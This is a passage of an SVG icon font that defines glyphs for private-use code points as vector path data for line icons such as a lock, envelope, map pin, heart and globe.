<glyph unicode="&#xe631;" d="M264.53 343.004v26.356c0 7.789 16.46 18.093 29.688 26.382 18.951 11.862 38.552 24.141 38.552 42.026v42.132h-17.060v-42.133c0-8.439-16.935-19.042-30.547-27.572-18.534-11.596-37.693-23.599-37.693-40.835v-26.356c-66.666-4.282-119.42-58.011-119.42-123.827v-126.833c0-68.615 57.286-124.244 127.95-124.244s127.95 55.628 127.95 124.244v126.833c0 65.816-52.755 119.545-119.42 123.827zM366.89 219.177v-12.237h-102.36v119.004c57.16-4.241 102.36-50.448 102.36-106.767zM145.11 219.177c0 56.319 45.199 102.526 102.36 106.767v-119.004h-102.36v12.237zM256-14.84c-61.143 0-110.89 48.081-110.89 107.184v97.536h221.78v-97.536c0-59.103-49.748-107.184-110.89-107.184z" />
<glyph unicode="&#xe632;" d="M51.28 275.18c-28.272 0-51.18-22.916-51.18-51.18s22.908-51.18 51.18-51.18c28.255 0 51.18 22.916 51.18 51.18s-22.925 51.18-51.18 51.18zM51.28 189.88c-18.826 0-34.12 15.302-34.12 34.12s15.294 34.12 34.12 34.12c18.809 0 34.12-15.303 34.12-34.12s-15.311-34.12-34.12-34.12zM460.72 275.18c-28.272 0-51.18-22.916-51.18-51.18s22.908-51.18 51.18-51.18c28.255 0 51.18 22.916 51.18 51.18s-22.925 51.18-51.18 51.18zM460.72 189.88c-18.809 0-34.12 15.302-34.12 34.12s15.311 34.12 34.12 34.12c18.809 0 34.12-15.303 34.12-34.12s-15.311-34.12-34.12-34.12zM256 275.18c-28.272 0-51.18-22.916-51.18-51.18s22.908-51.18 51.18-51.18c28.255 0 51.18 22.916 51.18 51.18s-22.925 51.18-51.18 51.18zM256 189.88c-18.809 0-34.12 15.302-34.12 34.12s15.311 34.12 34.12 34.12c18.809 0 34.12-15.303 34.12-34.12s-15.311-34.12-34.12-34.12z" />
<glyph unicode="&#xe633;" d="M158.105 399.169c-13.545-27.473-20.717-57.819-20.717-89.023 0-111.631 90.822-202.446 202.454-202.446 32.838 0 64.567 7.83 92.989 22.591-34.395-61.901-99.969-101.918-173.799-101.918-109.848 0-199.222 89.365-199.222 199.214 0 71.854 38.552 136.521 98.295 171.582zM204.645 436.687c-93.072-24.139-161.895-108.474-161.895-209.101 0-119.437 96.846-216.274 216.282-216.274 102.194 0 187.611 70.964 210.218 166.218-33.395-32.62-79.019-52.771-129.408-52.771-102.385 0-185.394 83-185.394 185.386 0.001 48.982 19.143 93.406 50.197 126.542v0z" />
<glyph unicode="&#xe634;" d="M477.78 113.11v307.080h-443.56v-307.080h213.25v-68.24h-59.71v-17.060h136.48v17.060h-59.71v68.24h213.25zM51.28 403.13h409.44v-272.96h-409.44v272.96z" />
<glyph unicode="&#xe635;" d="M256.042 121.971c51.691 0 93.61 41.91 93.61 93.61v170.217c0 51.7-41.919 93.602-93.61 93.602s-93.61-41.902-93.61-93.602v-170.216c0-51.7 41.918-93.611 93.61-93.611zM179.452 385.798c0 42.227 34.356 76.582 76.59 76.582s76.59-34.356 76.59-76.582v-170.216c0-42.234-34.356-76.59-76.59-76.59s-76.59 34.356-76.59 76.59v170.216zM383.65 300.69v-85.109c0-70.382-57.26-127.65-127.65-127.65s-127.65 57.268-127.65 127.65v85.109h-17.020v-85.109c0-77.28 60.958-140.415 137.291-144.296h-1.089v-85.665h-76.632v-17.020h170.2v17.020h-76.548v85.665h-1.172c76.333 3.881 137.29 67.016 137.29 144.296v85.109h-17.020z" />
<glyph unicode="&#xe636;" d="M51.28 369.010v-68.24h409.44v68.24h-409.44zM443.66 317.83h-375.32v34.12h375.32v-34.12zM51.28 189.88h409.44v68.24h-409.44v-68.24zM68.34 241.060h375.32v-34.12h-375.32v34.12zM51.28 78.99h409.44v68.24h-409.44v-68.24zM68.34 130.17h375.32v-34.12h-375.32v34.12z" />
<glyph unicode="&#xe637;" d="M368.872 425.596l-10.512 5.256-8.53-4.256v-0.009l-93.83-46.914-102.36 51.18-110.89-55.445v-358.26l110.89 55.445 102.36-51.18 102.36 51.18 110.89-55.445v358.26l-100.378 50.188zM145.11 87.404l-85.3-42.65v320.108l85.3 42.65v-320.108zM247.47 44.754l-85.3 42.65v320.108l85.3-42.65v-320.108zM349.83 87.404l-85.3-42.65v320.108l85.3 42.65v-320.108zM452.19 44.754l-85.3 42.65v320.108l85.3-42.65v-320.108z" />
<glyph unicode="&#xe638;" d="M256.009 462.848c84.659 0 153.531-68.881 153.531-153.548 0-26.923-7.13-53.463-20.633-76.779l-132.907-230.301-132.923 230.318c-13.487 23.3-20.617 49.839-20.617 76.762 0 84.667 68.881 153.548 153.549 153.548zM256.009 249.598c32.921 0 59.701 26.782 59.701 59.702 0 32.911-26.781 59.693-59.701 59.693-32.929 0-59.719-26.782-59.719-59.693 0-32.92 26.789-59.702 59.719-59.702zM256.009 479.908c-94.222 0-170.609-76.403-170.609-170.608 0-31.113 8.371-60.194 22.916-85.309l147.684-255.899 147.684 255.9c14.545 25.115 22.916 54.195 22.916 85.309 0 94.204-76.387 170.607-170.591 170.607v0zM256.009 266.658c-23.557 0-42.659 19.084-42.659 42.642 0 23.532 19.101 42.633 42.659 42.633 23.549 0 42.641-19.101 42.641-42.633 0-23.558-19.093-42.642-42.641-42.642v0z" />
<glyph unicode="&#xe639;" d="M451.898 360.482h-409.148v-272.963h426.5v272.963h-17.352zM434.838 343.422l-164.769-164.769c-7.513-7.513-20.626-7.513-28.139 0l-164.794 164.769h357.702zM59.81 336.625l110.773-110.757-110.773-110.773v221.53zM73.421 104.582l109.233 109.216 47.214-47.207c6.972-6.981 16.261-10.83 26.132-10.83s19.159 3.849 26.132 10.83l47.214 47.214 109.224-109.223h-365.149zM452.19 115.086l-110.773 110.782 110.773 110.782v-221.564z" />
<glyph unicode="&#xe63a;" d="M467.659 266.529l-185.528 185.528c-6.972 6.981-16.26 10.829-26.132 10.829-9.871 0-19.158-3.848-26.131-10.829l-187.118-187.094v-279.849h426.5v279.824l-1.591 1.591zM70.073 268.162l171.858 171.833c7.514 7.514 20.626 7.514 28.14 0l179.938-179.946-122.62-122.62-45.257 45.266c-6.972 6.98-16.26 10.829-26.132 10.829-9.871 0-19.158-3.849-26.131-10.829l-45.932-45.924-122.627 122.628 8.763 8.763zM171.867 124.718l-1.267-1.283-0.016 0.017-110.774-110.765v224.087l112.057-112.056zM73.421 2.174l9.171 9.171h0.026l159.312 159.288c7.514 7.514 20.626 7.514 28.14 0l168.501-168.459h-365.15zM452.19 230.885v-218.207l-112.739 112.69 112.739 112.739v-7.222z" />
<glyph unicode="&#xe63b;" d="M467.659 266.529l-185.527 185.527c-6.972 6.981-16.261 10.829-26.132 10.829s-19.159-3.848-26.132-10.829l-40.451-40.442h-61.359v-61.351l-85.308-85.3v-279.849h426.5v279.824l-1.591 1.591zM450.007 260.048l-66.057-66.057v132.115l66.057-66.058zM241.931 439.995c7.514 7.514 20.626 7.514 28.139 0l28.381-28.38h-84.908l28.388 28.38zM315.51 394.554l51.38-51.388v-166.235l-39.502-39.502-45.257 45.266c-6.972 6.98-16.261 10.829-26.132 10.829s-19.159-3.849-26.132-10.829l-45.931-45.924-38.818 38.818v218.965h170.392zM70.072 268.162l57.986 57.978v-133.49l-66.748 66.749 8.762 8.763zM59.81 223.072v13.702l112.056-112.056-1.266-1.283-0.017 0.017-110.773-110.765v210.385zM73.421 2.174l9.171 9.171h0.025l159.313 159.288c7.514 7.514 20.626 7.514 28.139 0l168.501-168.459h-365.149zM452.19 234.242v-221.564l-112.739 112.69 112.739 112.739v-3.865zM196.29 343.374h119.42v-17.060h-119.42v17.060zM196.29 241.014h119.42v-17.060h-119.42v17.060zM196.29 292.194h85.3v-17.060h-85.3v17.060z" />
<glyph unicode="&#xe63c;" d="M341.517 437.25v-238.623c0-47.231-38.285-85.517-85.517-85.517-47.249 0-85.517 38.285-85.517 85.517v238.623h-102.143v-238.84c0-103.643 84.017-187.66 187.66-187.66s187.66 84.017 187.66 187.66v238.84h-102.143zM426.6 420.19v-51.18h-68.023v51.18h68.023zM153.423 420.19v-51.18h-68.023v51.18h68.023zM256 27.81c-94.080 0-170.6 76.528-170.6 170.6v153.54h68.023v-153.323c0-56.562 46.015-102.577 102.577-102.577 56.561 0 102.577 46.015 102.577 102.577v153.323h68.023v-153.54c0-94.072-76.537-170.6-170.6-170.6z" />
<glyph unicode="&#xe63d;" d="M327.388 306.818l-148.242-147.143 12.046-12.094 148.242 147.142zM110.99 130.17c-51.738 0-93.83 42.092-93.83 93.83 0 51.739 42.092 93.83 93.83 93.83 25.057 0 47.789-9.929 64.634-25.982l0.008 0.092 0.867-0.758 33.212-33.062h-30.481v-17.060h59.71v59.71h-17.060v-30.696l-33.337 33.187-0.075-0.075c-20.009 19.584-47.34 31.704-77.478 31.704-61.143 0-110.89-49.747-110.89-110.89s49.747-110.89 110.89-110.89c31.529 0 59.96 13.295 80.177 34.495l-12.054 12.062c-17.118-18.118-41.292-29.497-68.123-29.497zM401.010 334.89c-28.239 0-53.962-10.696-73.554-28.139l12.053-12.054c16.486 14.361 37.969 23.133 61.501 23.133 51.738 0 93.83-42.091 93.83-93.83s-42.092-93.83-93.83-93.83c-24.966 0-47.623 9.863-64.45 25.815l-0.025-0.158-56.494 56.286-12.113-12.020 56.562-56.345 0.1 0.101c19.918-18.993 46.798-30.739 76.42-30.739 61.143 0 110.89 49.748 110.89 110.89s-49.747 110.89-110.89 110.89z" />
<glyph unicode="&#xe63e;" d="M256 377.538c-93.547 0-166.468-58.552-255.9-153.481 77.053-81.169 141.711-153.595 255.9-153.595s198.114 91.686 255.9 151.878c-59.152 70.515-143.086 155.198-255.9 155.198zM256 87.522c-101.369 0-162.561 62.871-232.376 136.518 83.068 86.616 149.117 136.438 232.376 136.438 98.57 0 175.606-71.080 232.925-137.454-56.369-58.777-132.689-135.502-232.925-135.502zM256 326.35c-56.445 0-102.36-45.916-102.36-102.352s45.915-102.352 102.36-102.352 102.36 45.915 102.36 102.351-45.915 102.353-102.36 102.353zM256 138.706c-47.032 0-85.3 38.26-85.3 85.291s38.268 85.292 85.3 85.292 85.3-38.26 85.3-85.292c0-47.030-38.268-85.291-85.3-85.291zM256 283.708c-32.921 0-59.71-26.789-59.71-59.71s26.789-59.71 59.71-59.71c32.921 0 59.71 26.79 59.71 59.71 0 32.921-26.789 59.71-59.71 59.71zM256 181.348c-23.516 0-42.65 19.134-42.65 42.65s19.134 42.65 42.65 42.65 42.65-19.134 42.65-42.65c0-23.516-19.134-42.65-42.65-42.65z" />
<glyph unicode="&#xe63f;" d="M366.89 232.53v102.36c0 61.234-49.647 110.89-110.874 110.89-61.251 0-110.906-49.656-110.906-110.89v-102.36h-59.71v-230.31h341.2v230.31h-59.71zM162.17 334.89c0 51.738 42.1 93.83 93.846 93.83 51.73 0 93.814-42.092 93.814-93.83v-102.36h-187.66v102.36zM409.54 19.28h-307.080v196.19h307.080v-196.19z" />
<glyph unicode="&#xe640;" d="M136.58 479.9v-51.18l59.71-102.36v-358.26h119.42v358.26l59.71 102.36v51.18h-238.84zM153.64 462.84h204.72v-29.505l-2.69-4.615h-199.34l-2.69 4.615v29.505zM213.35-14.84v34.195h85.3v-34.195h-85.3zM300.974 334.957l-2.324-3.982v-294.56h-85.3v294.56l-47.065 80.685h179.43l-44.741-76.703zM256 241.060c-14.128 0-25.59-11.462-25.59-25.59v-34.153c0-14.12 11.462-25.59 25.59-25.59 14.127 0 25.59 11.47 25.59 25.59v34.153c0 14.128-11.463 25.59-25.59 25.59zM264.53 181.317c0-4.706-3.823-8.53-8.53-8.53s-8.53 3.824-8.53 8.53v34.153c0 4.707 3.823 8.53 8.53 8.53s8.53-3.823 8.53-8.53v-34.153z" />
<glyph unicode="&#xe641;" d="M280.536 147.318c-20.812 0-41.63 7.914-57.473 23.766l12.062 12.061c25.048-25.048 65.787-25.040 90.844 0l107.446 107.45c25.040 25.041 25.040 65.783 0 90.831l-20.009 20.001c-25.041 25.040-65.791 25.040-90.836 0l-75.824-75.821-12.062 12.062 75.825 75.82c31.687 31.688 83.255 31.704 114.959 0l20.009-20c31.688-31.696 31.688-83.267 0-114.955l-107.447-107.448c-15.844-15.845-36.669-23.767-57.494-23.767zM144.010 10.739c-21.708 0-42.125 8.455-57.477 23.807l-20.009 20.001c-31.688 31.704-31.688 83.267 0 114.955l107.449 107.458c31.688 31.687 83.276 31.687 114.96 0l20.009-20.009-12.062-12.062-20.009 20.009c-25.036 25.041-65.795 25.032-90.835 0l-107.45-107.458c-25.032-25.032-25.032-65.783 0-90.832l20.009-20c12.129-12.129 28.264-18.81 45.415-18.81 17.161 0 33.287 6.681 45.416 18.81l71.505 71.505 12.061-12.062-71.505-71.505c-15.343-15.353-35.76-23.807-57.477-23.807z" />
<glyph unicode="&#xe642;" d="M350.171 398.161c56.336 0 102.019-45.674 102.019-102.019 0-28.938-12.070-55.019-31.43-73.596l-164.76-165.585-167.742 168.568c-17.602 18.334-28.448 43.191-28.448 70.613 0 56.345 45.682 102.019 102.019 102.019 42.425 0 78.794-25.915 94.171-62.776 15.377 36.861 51.746 62.776 94.171 62.776zM350.171 415.221c-37.527 0-71.988-17.427-94.171-46.148-22.183 28.721-56.644 46.148-94.171 46.148-65.658 0-119.079-53.421-119.079-119.079 0-30.854 11.787-60.126 33.204-82.425l180.046-180.938 176.856 177.731c23.366 22.425 36.394 52.93 36.394 85.633 0 65.657-53.421 119.078-119.079 119.078v0z" />
<glyph unicode="&#xe643;" d="M426.6 300.907c0 94.213-76.37 170.6-170.6 170.6s-170.6-76.387-170.6-170.6c0-55.487 26.573-104.667 67.607-135.797l-0.075-0.042c0.783-0.533 1.591-1.141 2.424-1.791 0.083-0.058 0.158-0.125 0.233-0.183 13.204-10.42 32.171-34.761 32.171-66.891v-119.711h136.48v119.712c0 34.12 19.709 58.603 34.12 68.332l-0.042 0.049c41.426 31.105 68.282 80.528 68.282 136.322zM204.82-6.447v51.471h102.36v-51.471h-102.36zM256 283.856c-9.404 0-17.060 7.647-17.060 17.051 0 9.413 7.656 17.069 17.060 17.069s17.060-7.656 17.060-17.069c0-9.404-7.656-17.051-17.060-17.051zM348.072 178.231c-0.224-0.175-0.449-0.351-0.666-0.533-18.876-13.429-40.226-42.342-40.226-81.494v-34.12h-42.65v205.92c14.686 3.807 25.59 17.034 25.59 32.904 0 18.843-15.277 34.129-34.12 34.129s-34.12-15.286-34.12-34.129c0-15.869 10.904-29.097 25.59-32.904v-205.92h-42.65v34.12c0 36.736-20.825 66.208-38.51 80.161-0.133 0.117-0.299 0.234-0.458 0.367-0.558 0.433-1.107 0.85-1.64 1.25-0.292 0.25-0.583 0.491-0.891 0.716-38.677 29.347-60.86 73.889-60.86 122.211 0 84.659 68.881 153.54 153.54 153.54s153.54-68.881 153.54-153.54c-0.001-48.641-22.401-93.349-61.469-122.678z" />
<glyph unicode="&#xe644;" d="M256 437.25c-117.787 0-213.25-95.464-213.25-213.25 0-117.787 95.463-213.25 213.25-213.25s213.25 95.463 213.25 213.25c0 117.786-95.463 213.25-213.25 213.25zM256 27.81c-108.174 0-196.19 88.015-196.19 196.19 0 108.174 88.016 196.19 196.19 196.19s196.19-88.016 196.19-196.19c0-108.175-88.016-196.19-196.19-196.19zM145.677 232.53h221.213v-17.060h-221.213v17.060z" />
<glyph unicode="&#xe645;" d="M110.99 130.166c-28.264 0-51.18-22.907-51.18-51.171s22.916-51.18 51.18-51.18c28.256 0 51.18 22.916 51.18 51.18s-22.924 51.171-51.18 51.171zM110.99 44.874c-18.817 0-34.12 15.303-34.12 34.12 0 18.81 15.303 34.111 34.12 34.111 18.818 0 34.12-15.302 34.12-34.111 0-18.817-15.302-34.12-34.12-34.12zM110.99 420.186c-28.264 0-51.18-22.907-51.18-51.171s22.916-51.18 51.18-51.18c28.256 0 51.18 22.916 51.18 51.18s-22.924 51.171-51.18 51.171zM110.99 334.894c-18.817 0-34.12 15.303-34.12 34.12 0 18.81 15.303 34.111 34.12 34.111 18.818 0 34.12-15.302 34.12-34.111 0-18.817-15.302-34.12-34.12-34.12zM110.99 275.534c-28.264 0-51.18-22.907-51.18-51.171s22.916-51.18 51.18-51.18c28.256 0 51.18 22.916 51.18 51.18s-22.924 51.171-51.18 51.171zM110.99 190.243c-18.817 0-34.12 15.31-34.12 34.12s15.303 34.111 34.12 34.111c18.818 0 34.12-15.302 34.12-34.111s-15.302-34.12-34.12-34.12zM256 130.166c-28.264 0-51.18-22.907-51.18-51.171s22.916-51.18 51.18-51.18c28.256 0 51.18 22.916 51.18 51.18s-22.924 51.171-51.18 51.171zM256 44.874c-18.817 0-34.12 15.303-34.12 34.12 0 18.81 15.303 34.111 34.12 34.111s34.12-15.302 34.12-34.111c0-18.817-15.302-34.12-34.12-34.12zM256 420.186c-28.264 0-51.18-22.907-51.18-51.171s22.916-51.18 51.18-51.18c28.256 0 51.18 22.916 51.18 51.18s-22.924 51.171-51.18 51.171zM256 334.894c-18.817 0-34.12 15.303-34.12 34.12 0 18.81 15.303 34.111 34.12 34.111s34.12-15.302 34.12-34.111c0-18.817-15.302-34.12-34.12-34.12zM256 275.534c-28.264 0-51.18-22.907-51.18-51.171s22.916-51.18 51.18-51.18c28.256 0 51.18 22.916 51.18 51.18s-22.924 51.171-51.18 51.171zM256 190.243c-18.817 0-34.12 15.31-34.12 34.12s15.303 34.111 34.12 34.111c18.818 0 34.12-15.302 34.12-34.111s-15.302-34.12-34.12-34.12zM401.010 130.166c-28.264 0-51.18-22.907-51.18-51.171s22.916-51.18 51.18-51.18c28.256 0 51.18 22.916 51.18 51.18s-22.924 51.171-51.18 51.171zM401.010 44.874c-18.817 0-34.12 15.303-34.12 34.12 0 18.81 15.303 34.111 34.12 34.111s34.12-15.302 34.12-34.111c0-18.817-15.302-34.12-34.12-34.12zM401.010 317.834c28.256 0 51.18 22.916 51.18 51.18s-22.924 51.171-51.18 51.171c-28.264 0-51.18-22.907-51.18-51.171s22.916-51.18 51.18-51.18zM401.010 403.126c18.818 0 34.12-15.302 34.12-34.111 0-18.817-15.302-34.12-34.12-34.12s-34.12 15.303-34.12 34.12c0 18.809 15.303 34.111 34.12 34.111zM401.010 275.534c-28.264 0-51.18-22.907-51.18-51.171s22.916-51.18 51.18-51.18c28.256 0 51.18 22.916 51.18 51.18s-22.924 51.171-51.18 51.171zM401.010 190.243c-18.817 0-34.12 15.31-34.12 34.12s15.303 34.111 34.12 34.111c18.818 0 34.12-15.302 34.12-34.111s-15.302-34.12-34.12-34.12z" />
<glyph unicode="&#xe646;" d="M319.375 241.377l-12.062 12.061-51.304-51.313-51.314 51.313-12.062-12.061 51.305-51.314-51.472-51.463 12.062-12.062 51.481 51.464 51.47-51.464 12.063 12.062-51.472 51.463zM469.25 368.993h-426.5v-17.060h12.537l4.523-34.12c0-13.611 8.022-25.256 19.542-30.738l30.088-175.498c3.149-17.86 14.586-32.571 32.571-32.571h227.978c17.976 0 28.889 14.445 32.57 32.571l30.089 175.498c11.521 5.481 19.542 17.127 19.542 30.738l4.523 34.12h12.537v17.060zM385.791 114.726c-1.474-7.081-5.464-18.659-15.802-18.659h-227.978c-11.612 0-15.003 14.144-15.76 18.393l-29.014 169.233h317.526l-28.972-168.967zM435.28 320.046l-0.15-1.116v-1.117c0-9.413-7.656-17.060-17.060-17.060h-324.14c-9.404 0-17.060 7.647-17.060 17.060v1.117l-0.15 1.116-4.223 31.888h367.007l-4.224-31.888z" />
<glyph unicode="&#xe647;" d="M257.066 301.503c14.127 0 25.59 11.463 25.59 25.59 0 14.144-11.463 25.574-25.59 25.574-14.128 0-25.59-11.429-25.59-25.574 0-14.128 11.462-25.59 25.59-25.59zM274.443 267.383v17.060h-51.18v-17.060h17.060v-145.010h-17.060v-17.060h68.24v17.060h-17.060zM256 437.25c-117.77 0-213.25-95.48-213.25-213.25 0-117.787 95.48-213.25 213.25-213.25s213.25 95.463 213.25 213.25c0 117.77-95.48 213.25-213.25 213.25zM256 27.81c-108.183 0-196.19 88.016-196.19 196.19s88.007 196.19 196.19 196.19c108.183 0 196.19-88.016 196.19-196.19s-88.007-196.19-196.19-196.19z" />
<glyph unicode="&#xe648;" d="M256 437.25l-85.3-85.3v34.12h-68.24v-102.36l-60.077-60.077 12.062-12.062 201.555 201.554 201.555-201.555 12.062 12.062-213.617 213.618zM119.52 369.010h34.12v-34.12l-34.12-34.12v68.24zM102.46 215.47v-204.72h119.42v119.42h68.24v-119.42h119.42v204.72l-153.54 153.54-153.54-153.54zM392.48 27.81h-85.3v119.42h-102.36v-119.42h-85.3v180.595l136.48 136.48 136.48-136.48v-180.595z" />
<glyph unicode="&#xe649;" d="M256 428.72c-113.056 0-204.72-91.647-204.72-204.72 0-113.063 91.656-204.711 204.72-204.72 113.073 0.009 204.72 91.664 204.72 204.72-0.008 113.064-91.656 204.72-204.72 204.72zM255.984 130.17c-51.73 0-93.814 42.092-93.814 93.83 0 51.739 42.092 93.83 93.83 93.83h0.017c51.729 0 93.813-42.091 93.813-93.83 0-51.729-42.091-93.821-93.846-93.83zM358.327 266.767l64.45 43.092c13.311-25.749 20.883-54.929 20.883-85.859 0-30.537-7.38-59.368-20.375-84.875l-64.567 43.183c5.232 12.879 8.172 26.932 8.172 41.692 0 15.161-3.057 29.605-8.563 42.767zM414.238 324.669l-63.842-42.683c-9.28 15.078-22.033 27.731-37.193 36.885l42.708 63.858c23.458-14.81 43.4-34.669 58.327-58.060zM341.050 391.193l-43.166-64.541c-12.92 5.282-27.039 8.238-41.867 8.238h-0.017c-14.828 0-28.939-2.956-41.867-8.238l-43.174 64.55c25.548 13.053 54.436 20.458 85.041 20.458s59.502-7.413 85.050-20.467zM156.097 382.747l42.717-63.867c-15.194-9.18-27.972-21.867-37.26-36.978l-63.85 42.7c14.936 23.417 34.911 43.308 58.393 58.145zM89.182 309.784l64.458-43.108c-5.481-13.145-8.53-27.548-8.53-42.676 0-14.719 2.933-28.747 8.138-41.591l-64.583-43.192c-12.961 25.482-20.325 54.287-20.325 84.783 0 30.897 7.556 60.052 20.842 85.784zM97.104 124.339l63.867 42.709c9.222-15.352 22.024-28.256 37.302-37.602l-42.699-63.842c-23.575 14.994-43.584 35.086-58.47 58.735zM170.401 57.091l43.117 64.475c13.086-5.432 27.414-8.456 42.467-8.456 0.009 0 0.016 0 0.016 0 15.061 0 29.406 3.032 42.5 8.472l43.117-64.483c-25.69-13.236-54.778-20.759-85.616-20.759-30.831 0-59.912 7.523-85.601 20.751zM356.444 65.612l-42.699 63.85c15.235 9.33 28.013 22.192 37.227 37.502l63.867-42.717c-14.878-23.598-34.862-43.658-58.395-58.635z" />
<glyph unicode="&#xe64a;" d="M256 437.25c-117.779 0-213.25-95.471-213.25-213.25 0-117.771 95.471-213.25 213.25-213.25s213.25 95.479 213.25 213.25c0 117.779-95.471 213.25-213.25 213.25zM256 27.81c-108.183 0-196.19 88.007-196.19 196.19s88.007 196.19 196.19 196.19 196.19-88.007 196.19-196.19c0-108.183-88.007-196.19-196.19-196.19zM255.276 335.798c-43.3 0-67.474-26.756-67.782-69.148h18.809c-0.591 30.754 15.528 53.32 48.073 53.32 23.283 0 42.692-16.419 42.692-40.301 0-15.527-8.364-28.064-19.409-38.518-22.683-21.059-29.047-30.955-30.189-59.801h19.051c1.125 26.156 0.542 25.631 23.375 48.456 15.227 14.328 25.973 28.672 25.973 50.764 0 34.628-27.465 55.228-60.593 55.228zM256 147.221c-9.413 0-17.060-7.639-17.060-17.051 0-9.43 7.647-17.060 17.060-17.060 9.421 0 17.060 7.63 17.060 17.060 0 9.413-7.639 17.051-17.060 17.051z" />
<glyph unicode="&#xe64b;" d="M452.19 249.59v-204.72h-85.3v375.32h-17.060v-375.32h-85.3v255.9h-17.060v-255.9h-85.3v102.36h-17.060v-102.36h-85.225v153.54h-17.060v-153.54h-0.075v-17.060h426.5v221.78z" />
<glyph unicode="&#xe64c;" d="M51.28 428.72v-409.44h409.44v409.44h-409.44zM443.66 411.66v-73.497l-112.364-162.103-77.037 60.877-85.7-119.986-50.596 33.728-49.623-57.845v318.826h375.32zM68.34 36.34v30.296l52.738 61.468 51.763-34.512 84.9 118.854 77.237-61.026 108.682 156.797v-271.877h-375.32z" />
<glyph unicode="&#xe64d;" d="M447.925 462.84c-23.516 0-42.65-19.126-42.65-42.634 0-14.819 7.614-27.88 19.118-35.527l-80.644-212.551c-2.232 0.367-4.481 0.692-6.805 0.692-10.221 0-19.484-3.765-26.84-9.78l-80.693 66.649c3.182 5.972 5.156 12.678 5.156 19.9 0 23.516-19.134 42.65-42.65 42.65s-42.65-19.135-42.65-42.65c0-12.704 5.698-24.008 14.544-31.83l-85.983-149.765c-4.339 1.491-8.904 2.474-13.744 2.474-23.524 0-42.659-19.126-42.659-42.633 0-23.533 19.134-42.675 42.659-42.675 23.516 0 42.641 19.142 42.641 42.675 0 12.537-5.539 23.707-14.185 31.521l86.075 149.925c4.215-1.4 8.63-2.341 13.303-2.341 10.122 0 19.301 3.69 26.623 9.596l80.777-66.716c-3.099-5.915-5.023-12.529-5.023-19.651 0-23.516 19.135-42.65 42.65-42.65 23.516 0 42.65 19.134 42.65 42.65 0 15.136-7.98 28.364-19.892 35.944l80.518 212.201c2.508-0.458 5.065-0.775 7.705-0.775 23.516 0 42.65 19.142 42.65 42.666-0.001 23.509-19.135 42.635-42.651 42.635zM64.084 2.22c-14.111 0-25.599 11.487-25.599 25.615 0 14.103 11.487 25.573 25.599 25.573 14.103 0 25.581-11.47 25.581-25.573 0-14.128-11.479-25.615-25.581-25.615zM191.917 224c-14.111 0-25.59 11.479-25.59 25.59s11.479 25.59 25.59 25.59 25.59-11.479 25.59-25.59-11.479-25.59-25.59-25.59zM336.944 104.58c-14.111 0-25.59 11.479-25.59 25.59s11.479 25.59 25.59 25.59 25.59-11.479 25.59-25.59c0-14.111-11.479-25.59-25.59-25.59zM447.925 394.6c-14.111 0-25.59 11.486-25.59 25.606 0 14.103 11.479 25.574 25.59 25.574s25.59-11.471 25.59-25.574c0-14.12-11.479-25.606-25.59-25.606z" />
<glyph unicode="&#xe64e;" d="M469.254 224c0 114.897-90.915 208.552-204.728 213.033v0.217h-17.060v-0.217c-113.814-4.481-204.72-98.136-204.72-213.033 0-117.787 95.479-213.25 213.25-213.25 41.371 0 79.956 11.82 112.664 32.203l0.117-0.166 6.347 4.315c0.084 0.049 0.15 0.091 0.217 0.142l7.547 5.123-0.116 0.166c52.462 38.843 86.482 101.169 86.482 171.467zM435.484 303.094l-170.958-66.616v183.495c76.391-3.291 141.57-50.455 170.958-116.879zM255.996 27.81c-108.183 0-196.19 88.007-196.19 196.19 0 105.316 83.425 191.483 187.66 195.973v-198.598l111.565-164.243c-29.976-18.568-65.262-29.322-103.035-29.322zM373.142 66.711l-104.076 153.232 172.615 67.257c6.78-19.842 10.512-41.084 10.512-63.2 0.001-64.309-31.103-121.486-79.051-157.289z" />
<glyph unicode="&#xe64f;" d="M256 437.25c-0.058 0-0.117 0-0.183 0-0.025 0-0.049 0-0.083 0-0.084 0-0.167-0.017-0.25-0.017-117.546-0.266-212.734-95.629-212.734-213.233 0-117.571 95.188-212.951 212.734-213.234 0.083 0 0.166-0.016 0.25-0.016 0.033 0 0.058 0 0.083 0 0.067 0 0.125 0 0.183 0 117.754 0 213.25 95.496 213.25 213.25 0 117.77-95.496 213.25-213.25 213.25zM264.53 309.633c22.608 0.617 44.608 3.599 65.791 8.764 6.389-25.14 10.346-54.113 10.97-85.866h-76.761v77.102zM264.53 326.693v92.148c22.999-6.364 46.291-37.019 61.143-84.034-19.701-4.749-40.143-7.515-61.143-8.114zM247.47 419.040v-92.347c-21.175 0.6-41.783 3.415-61.634 8.247 14.969 47.297 38.484 78.069 61.634 84.1zM247.47 309.65v-77.12h-77.295c0.624 31.804 4.598 60.81 10.988 85.966 21.35-5.214 43.516-8.247 66.307-8.846zM153.007 232.53h-92.98c1.883 43.849 18.218 84.033 44.374 115.854 18.993-10.463 39.143-19.026 60.252-25.424-6.89-27.205-11.022-57.876-11.646-90.43zM153.007 215.47c0.624-32.538 4.756-63.209 11.645-90.415-21.1-6.414-41.259-14.977-60.252-25.44-26.156 31.821-42.491 72.005-44.373 115.855h92.98zM170.175 215.47h77.295v-77.020c-22.791-0.601-44.966-3.649-66.316-8.881-6.389 25.141-10.354 54.129-10.979 85.901zM247.47 121.406v-92.447c-23.166 6.048-46.698 36.852-61.659 84.201 19.859 4.831 40.476 7.647 61.659 8.246zM264.53 29.159v92.247c21.009-0.6 41.451-3.382 61.159-8.13-14.844-47.048-38.151-77.752-61.159-84.117zM264.53 138.45v77.020h76.761c-0.624-31.721-4.581-60.66-10.946-85.784-21.199 5.165-43.199 8.164-65.815 8.764zM358.46 215.47h93.514c-1.883-43.85-18.209-84.018-44.366-115.838-19.151 10.529-39.467 19.159-60.759 25.59 6.872 27.172 10.986 57.777 11.611 90.248zM358.46 232.53c-0.624 32.521-4.748 63.142-11.629 90.331 21.276 6.431 41.592 15.044 60.727 25.573 26.181-31.82 42.525-72.021 44.416-115.904h-93.514zM395.804 361.463c-16.969-9.030-34.887-16.494-53.596-22.158-9.972 32.088-23.974 58.278-40.526 75.471 36.319-8.714 68.748-27.507 94.122-53.313zM209.643 414.609c-16.468-17.161-30.404-43.233-40.343-75.154-18.525 5.648-36.286 13.045-53.104 22.008 25.207 25.639 57.395 44.382 93.447 53.146zM116.138 86.603c16.836 8.98 34.604 16.378 53.146 22.025 9.937-31.954 23.874-58.061 40.359-75.237-36.078 8.779-68.281 27.539-93.505 53.212zM301.674 33.241c16.577 17.193 30.58 43.4 40.559 75.537 18.717-5.681 36.644-13.128 53.62-22.191-25.373-25.824-57.827-44.65-94.179-53.346z" />
